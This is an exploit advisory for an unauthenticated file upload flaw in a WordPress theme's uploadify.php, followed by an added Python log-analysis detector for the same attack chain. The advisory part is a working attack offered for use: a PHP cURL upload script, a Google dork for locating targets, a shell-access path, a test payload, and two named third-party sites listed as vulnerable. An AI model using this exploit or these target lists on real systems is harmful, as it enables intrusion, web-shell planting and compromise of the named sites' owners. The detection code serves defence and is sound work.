
Wordpress Themes moneymasters Arbitrary File Upload Vulnerability

Author: Gastro-Dz , Published: 25-12-2012


###########################################################
# Author : Gastro-Dz #
# Date : 25/12/2012 #
# Facebook => http://fb.me/Gastr0 #
# Vendor : http://www.glothemes.com/moneymasters/ #
# Google Dork => inurl:/wp-content/themes/moneymasters #
# Tested on : Windows 7 , Kubuntu 11.04 #
###########################################################

Exploit : uploadshell.php

<?php
// Local file to upload (the test payload is shown below).
$uploadfile = "Gastro.php";

// The theme ships the uploader at /wp-content/themes/moneymasters/code/uploadify/uploadify.php.
// It requires no authentication and writes 'Filedata' into the client-supplied 'folder'.
$ch = curl_init("http://www.vulnsite.com/wp-content/themes/moneymasters/code/uploadify/uploadify.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
    array(
        // "@file" is the pre-PHP 5.5 cURL upload syntax; PHP >= 5.5 needs CURLFile.
        'Filedata' => class_exists('CURLFile') ? new CURLFile($uploadfile) : "@$uploadfile",
        'folder'   => '/wp-content/themes/moneymasters/code/uploadify/'));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);

// Print the uploader's response to learn where the file landed.
print "$postResult";
?>


Shell Access : http://localhost/wordpress/wp-content/themes/moneymasters/code/uploadify/random_name.php
(substitute the file name reported in the upload response printed by the script above)
-------------------
Gastro.php (test payload, proves code execution):

<?php
phpinfo();
?>
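Added example, not part of the original advisory: detection logic for the exploitation chain above, run over a few constructed access-log lines (IPs and paths are made up; only the uploadify directory path comes from the advisory). It flags every POST to the theme's unauthenticated uploadify.php, every fetch of a script dropped into that directory, and the confirmed chain where the same client does both in order.

```python
import re
from datetime import datetime

# Paths from the advisory: the uploader takes a 'Filedata' file and a
# client-controlled 'folder' parameter with no authentication.
UPLOADIFY_DIR = "/wp-content/themes/moneymasters/code/uploadify/"
UPLOADER = UPLOADIFY_DIR + "uploadify.php"
SCRIPT_EXTS = (".php", ".php3", ".php4", ".php5", ".phtml", ".phar")

# Apache/nginx "combined"-style access log line.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+'
)

# Constructed sample log (documentation-range IPs): one successful upload followed
# by a fetch of the dropped file, one rejected upload, and one GET probe of the uploader.
SAMPLE_LOG = """\
203.0.113.7 - - [25/Dec/2012:10:01:02 +0000] "GET /wp-content/themes/moneymasters/style.css HTTP/1.1" 200 4102
198.51.100.23 - - [25/Dec/2012:10:02:10 +0000] "POST /wp-content/themes/moneymasters/code/uploadify/uploadify.php HTTP/1.1" 200 61
198.51.100.23 - - [25/Dec/2012:10:02:15 +0000] "GET /wp-content/themes/moneymasters/code/uploadify/Gastro.php HTTP/1.1" 200 52311
203.0.113.7 - - [25/Dec/2012:10:05:00 +0000] "POST /wp-content/themes/moneymasters/code/uploadify/uploadify.php?x=1 HTTP/1.1" 403 199
192.0.2.44 - - [25/Dec/2012:10:06:30 +0000] "GET /wp-content/themes/moneymasters/code/uploadify/uploadify.php HTTP/1.1" 200 0
"""


def parse_line(line):
    """Parse one access-log line into a dict, or return None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    raw_path = m.group("path")
    return {
        "ip": m.group("ip"),
        "ts": datetime.strptime(m.group("ts"), "%d/%b/%Y:%H:%M:%S %z"),
        "method": m.group("method"),
        "path": raw_path,
        # query string stripped and lower-cased for matching only
        "path_lc": raw_path.split("?", 1)[0].lower(),
        "status": int(m.group("status")),
    }


def is_upload_attempt(ev):
    """POST to the theme's uploader: suspicious on its own, since it needs no login."""
    return ev["method"] == "POST" and ev["path_lc"] == UPLOADER


def is_dropped_script_fetch(ev):
    """Request for a server-side script inside uploadify/ other than the uploader itself."""
    return (ev["path_lc"].startswith(UPLOADIFY_DIR)
            and ev["path_lc"] != UPLOADER
            and ev["path_lc"].endswith(SCRIPT_EXTS))


def analyze(log_text):
    """Return upload attempts, dropped-script fetches, and confirmed upload->fetch chains."""
    findings = {"upload_attempts": [], "script_fetches": [], "confirmed_chains": []}
    first_ok_upload = {}  # ip -> timestamp of first 2xx POST to the uploader
    for line in log_text.splitlines():
        ev = parse_line(line)
        if ev is None:
            continue
        if is_upload_attempt(ev):
            findings["upload_attempts"].append((ev["ip"], ev["status"]))
            if 200 <= ev["status"] < 300:
                first_ok_upload.setdefault(ev["ip"], ev["ts"])
        elif is_dropped_script_fetch(ev):
            findings["script_fetches"].append((ev["ip"], ev["path"]))
            t0 = first_ok_upload.get(ev["ip"])
            if t0 is not None and ev["ts"] >= t0:
                findings["confirmed_chains"].append((ev["ip"], ev["path"]))
    return findings


if __name__ == "__main__":
    for kind, items in analyze(SAMPLE_LOG).items():
        print(kind, items)
```

Caveat: the `folder` parameter in the exploit is attacker-controlled, so the dropped file need not land under uploadify/ at all; on a real incident widen the second check to any newly served script under the web root, and treat every POST to uploadify.php as worth a look regardless of what follows.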

------------------------------

[#] Demo vulnerable sites :

http://themiza.com/wp-content/themes/moneymasters/code/uploadify/uploadify.php
http://www.vietbacsecurity.com/wp-content/themes/moneymasters/code/uploadify/uploadify.php

[#] Greeting ################################################################################################################
#
EvilDz - Hacker-1420 - Jago-dz - DamaneDz - Th3 killer Dz - HTC28DZ - Oxyl - Over-x - Asmar Dz-Root.com & Sec4Ever.com #
#
#############################################################################################################################

------------------------------ The End ---------------------------------------------------
